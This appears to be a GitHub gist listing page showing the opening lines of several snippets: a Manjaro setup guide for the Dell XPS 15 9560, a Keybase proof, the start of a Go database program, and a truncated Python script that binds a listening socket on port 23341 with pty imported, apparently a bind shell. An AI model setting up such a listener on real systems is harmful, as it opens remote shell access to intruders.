Skip to content

Instantly share code, notes, and snippets.

@ajvb
ajvb / Dell XPS 15 9560 Manjaro Setup instructions
Created July 27, 2018 18:21 — forked from meirbon/Dell XPS 15 9560 Manjaro Setup instructions
Small, quick guide to set up Manjaro on the XPS 15 9560
# 1. First of all of course get Manjaro:
https://manjaro.org/get-manjaro/
# I recommend using Etcher to copy the image to your USB:
https://etcher.io/
# 2. Before installing make sure:
# - Secure boot is disabled in BIOS
# - Your SSD, HDD or NVME drive is set to AHCI instead of RAID
# - Fastboot should be on Auto or minimal, but this shouldn't matter to much
@ajvb
ajvb / keybase.md
Created July 8, 2017 21:34
keybase.md

Keybase proof

I hereby claim:

  • I am ajvb on github.
  • I am ajvb (https://keybase.io/ajvb) on keybase.
  • I have a public key whose fingerprint is 6FF3 FF22 9DAC 5B28 A8A9 53DB DA5A BEA6 9185 1300

To claim this, I am signing this object:

#!/usr/bin/python
import os
import pty
import socket
lport = 23341
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', lport))
package main
import (
"database/sql"
"errors"
"fmt"
_ "github.com/bmizerany/pq"
"os"
"regexp"
"strings"